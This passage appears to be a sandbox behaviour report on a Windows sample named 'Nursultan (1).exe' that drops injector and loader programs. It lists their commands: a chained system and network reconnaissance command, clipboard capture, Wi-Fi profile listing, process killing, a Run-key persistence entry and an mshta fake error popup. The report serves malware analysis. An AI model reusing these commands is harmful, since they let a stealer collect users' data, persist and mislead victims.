        Kills process with taskkill
        
        PID:2872
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3976"
        6⤵
        
        PID:2000
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3976
        7⤵
        Kills process with taskkill
        
        PID:3276
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5456"
        6⤵
        
        PID:228
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5456
        7⤵
        Kills process with taskkill
        
        PID:1032
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        6⤵
        
        PID:4732
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        7⤵
        
        PID:4692
        
        C:\Windows\system32\chcp.com
        
        chcp
        8⤵
        
        PID:5212
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        6⤵
        
        PID:4492
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        7⤵
        
        PID:4316
        
        C:\Windows\system32\chcp.com
        
        chcp
        8⤵
        
        PID:4764
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:2248
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:2256
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        6⤵
        Clipboard Data
        
        PID:3776
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        7⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:1656
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        6⤵
        Network Service Discovery
        
        PID:4324
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:416
        
        C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        7⤵
        
        PID:4544
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        7⤵
        Collects information from the system
        Suspicious behavior: EnumeratesProcesses
        
        PID:4460
        
        C:\Windows\system32\net.exe
        
        net user
        7⤵
        
        PID:3624
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        8⤵
        
        PID:2156
        
        C:\Windows\system32\query.exe
        
        query user
        7⤵
        
        PID:3912
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        8⤵
        
        PID:3444
        
        C:\Windows\system32\net.exe
        
        net localgroup
        7⤵
        
        PID:4680
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        8⤵
        
        PID:544
        
        C:\Windows\system32\net.exe
        
        net localgroup administrators
        7⤵
        
        PID:5728
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        8⤵
        
        PID:1980
        
        C:\Windows\system32\net.exe
        
        net user guest
        7⤵
        
        PID:1296
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        8⤵
        
        PID:4972
        
        C:\Windows\system32\net.exe
        
        net user administrator
        7⤵
        
        PID:5408
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        8⤵
        
        PID:1860
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5656
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        7⤵
        Enumerates processes with tasklist
        
        PID:5792
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:3672
        
        C:\Windows\system32\ROUTE.EXE
        
        route print
        7⤵
        
        PID:3576
        
        C:\Windows\system32\ARP.EXE
        
        arp -a
        7⤵
        Network Service Discovery
        
        PID:3684
        
        C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        7⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:4516
        
        C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        7⤵
        Launches sc.exe
        
        PID:5784
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5832
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4684
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3284
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3980
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:1012
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:8
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:5276
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3592
  - - C:\Users\Admin\Downloads\ParadiseServices.exe
      ParadiseServices
      4⤵
      Executes dropped EXE
      PID:1620
  - - C:\Users\Admin\Downloads\Nurik.exe
      Nurik
      4⤵
      Executes dropped EXE
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:5604
- C:\Users\Admin\Downloads\Nursultan (1).exe
  "C:\Users\Admin\Downloads\Nursultan (1).exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2944
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1B7F.tmp\1B80.tmp\1B81.bat "C:\Users\Admin\Downloads\Nursultan (1).exe""
    3⤵
    PID:5616
  - - C:\Users\Admin\Downloads\ParadiseInJector.exe
      ParadiseInJector
      4⤵
      Executes dropped EXE
      PID:3472
    - - C:\Users\Admin\Downloads\ParadiseInJector.exe
        
        ParadiseInJector
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5900
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:5348
  - - C:\Users\Admin\Downloads\ParadiseServices.exe
      ParadiseServices
      4⤵
      Executes dropped EXE
      PID:3616
  - - C:\Users\Admin\Downloads\Nurik.exe
      Nurik
      4⤵
      Executes dropped EXE
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:2192

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2164

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:4132

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Nursultan (1).exe"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2944

C:\Users\Admin\Downloads\Nursultan (1).exe
"C:\Users\Admin\Downloads\Nursultan (1).exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1972
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C9EF.tmp\C9F0.tmp\C9F1.bat "C:\Users\Admin\Downloads\Nursultan (1).exe""
  2⤵
  PID:2780
- - C:\Users\Admin\Downloads\ParadiseInJector.exe
    ParadiseInJector
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4376
  - - C:\Users\Admin\Downloads\ParadiseInJector.exe
      ParadiseInJector
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      PID:3860
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:3892
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:4672
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        Suspicious behavior: EnumeratesProcesses
        
        PID:5192
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        5⤵
        
        PID:3596
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3476
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        5⤵
        
        PID:5064
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:3076
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:4016
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        5⤵
        
        PID:3804
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        6⤵
        
        PID:2972
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:4744
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:5812
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:1948
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:4960
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"
        5⤵
        
        PID:4020
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f
        6⤵
        Adds Run key to start application
        
        PID:1764
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
        5⤵
        
        PID:5656
      - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
        6⤵
        
        PID:1020
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:2512
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:2380
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        5⤵
        
        PID:392
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        6⤵
        
        PID:5500
        
        C:\Windows\system32\chcp.com
        
        chcp
        7⤵
        
        PID:3396
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        5⤵
        
        PID:4748
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        6⤵
        
        PID:4084
        
        C:\Windows\system32\chcp.com
        
        chcp
        7⤵
        
        PID:1036
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:4500
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5708
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:4480
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        6⤵
        Clipboard Data
        
        PID:3592
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        5⤵
        Network Service Discovery
        
        PID:2252
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:324
      - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        6⤵
        
        PID:4296
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        6⤵
        Collects information from the system
        
        PID:1160
      - C:\Windows\system32\net.exe
        
        net user
        6⤵
        
        PID:4404
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        7⤵
        
        PID:3740
      - C:\Windows\system32\query.exe
        
        query user
        6⤵
        
        PID:3520
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        7⤵
        
        PID:2608
      - C:\Windows\system32\net.exe
        
        net localgroup
        6⤵
        
        PID:632
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        7⤵
        
        PID:3504
      - C:\Windows\system32\net.exe
        
        net localgroup administrators
        6⤵
        
        PID:4668
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        7⤵
        
        PID:5144
      - C:\Windows\system32\net.exe
        
        net user guest
        6⤵
        
        PID:5176
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        7⤵
        
        PID:3720
      - C:\Windows\system32\net.exe
        
        net user administrator
        6⤵
        
        PID:2704
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        7⤵
        
        PID:3692
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        6⤵
        
        PID:700
      - C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        6⤵
        Enumerates processes with tasklist
        
        PID:456
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        6⤵
        Gathers network information
        
        PID:4700
      - C:\Windows\system32\ROUTE.EXE
        
        route print
        6⤵
        
        PID:1384
      - C:\Windows\system32\ARP.EXE
        
        arp -a
        6⤵
        Network Service Discovery
        
        PID:5344
      - C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        6⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:4424
      - C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        6⤵
        Launches sc.exe
        
        PID:1356
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1992
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3200
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5472
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1724
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:1576
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:5684
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:5900
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:4940
- - C:\Users\Admin\Downloads\ParadiseServices.exe
    ParadiseServices
    3⤵
    - Executes dropped EXE
    PID:2092
- - C:\Users\Admin\Downloads\Nurik.exe
    Nurik
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:936

C:\Users\Admin\Downloads\Nursultan (1).exe
"C:\Users\Admin\Downloads\Nursultan (1).exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3840
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1EF4.tmp\1EF5.tmp\1EF6.bat "C:\Users\Admin\Downloads\Nursultan (1).exe""
  2⤵
  PID:1864
- - C:\Users\Admin\Downloads\ParadiseInJector.exe
    ParadiseInJector
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4544
  - - C:\Users\Admin\Downloads\ParadiseInJector.exe
      ParadiseInJector
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:3848
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:6008
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:5960
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:5356
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        5⤵
        
        PID:560
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        6⤵
        
        PID:5644
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        5⤵
        
        PID:3528
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:1672
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:392
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        5⤵
        
        PID:4092
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        6⤵
        
        PID:2768
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:3592
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:6016
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:4104
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:3940
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"
        5⤵
        
        PID:5472
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f
        6⤵
        Adds Run key to start application
        
        PID:5776
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
        5⤵
        
        PID:5972
      - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
        6⤵
        
        PID:1776
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:4164
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:1160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        5⤵
        
        PID:2704
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        6⤵
        
        PID:1356
        
        C:\Windows\system32\chcp.com
        
        chcp
        7⤵
        
        PID:4984
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        5⤵
        
        PID:3916
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        6⤵
        
        PID:1364
        
        C:\Windows\system32\chcp.com
        
        chcp
        7⤵
        
        PID:1320
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:1152
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:4764
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:5984
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        6⤵
        Clipboard Data
        
        PID:1528
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        5⤵
        Network Service Discovery
        
        PID:2384
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:1972
      - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        6⤵
        
        PID:5936
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        6⤵
        Collects information from the system
        
        PID:4780
      - C:\Windows\system32\net.exe
        
        net user
        6⤵
        
        PID:1108
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        7⤵
        
        PID:2280
      - C:\Windows\system32\query.exe
        
        query user
        6⤵
        
        PID:2804
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        7⤵
        
        PID:3292
      - C:\Windows\system32\net.exe
        
        net localgroup
        6⤵
        
        PID:2800
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        7⤵
        
        PID:6080
      - C:\Windows\system32\net.exe
        
        net localgroup administrators
        6⤵
        
        PID:4672
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        7⤵
        
        PID:1060
      - C:\Windows\system32\net.exe
        
        net user guest
        6⤵
        
        PID:3476
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        7⤵
        
        PID:4600
      - C:\Windows\system32\net.exe
        
        net user administrator
        6⤵
        
        PID:2084
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        7⤵
        
        PID:188
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        6⤵
        
        PID:2112
      - C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        6⤵
        Enumerates processes with tasklist
        
        PID:1700
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        6⤵
        Gathers network information
        
        PID:5012
      - C:\Windows\system32\ROUTE.EXE
        
        route print
        6⤵
        
        PID:5076
      - C:\Windows\system32\ARP.EXE
        
        arp -a
        6⤵
        Network Service Discovery
        
        PID:3708
      - C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        6⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:3840
      - C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        6⤵
        Launches sc.exe
        
        PID:5504
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1524
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:636
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6020
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:772
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:1496
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:4652
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:4516
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:732
- - C:\Users\Admin\Downloads\ParadiseServices.exe
    ParadiseServices
    3⤵
    - Executes dropped EXE
    PID:2292
- - C:\Users\Admin\Downloads\Nurik.exe
    Nurik
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Enumerates connected drives
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetWindowsHookEx
    PID:3804
  - - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedgewebview2.exe
      "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=Nurik.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\NTFLoader\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --mojo-named-platform-channel-pipe=3804.2720.2917061512638543146
      4⤵
      Drops file in Windows directory
      Enumerates system info in registry
      Modifies data under HKEY_USERS
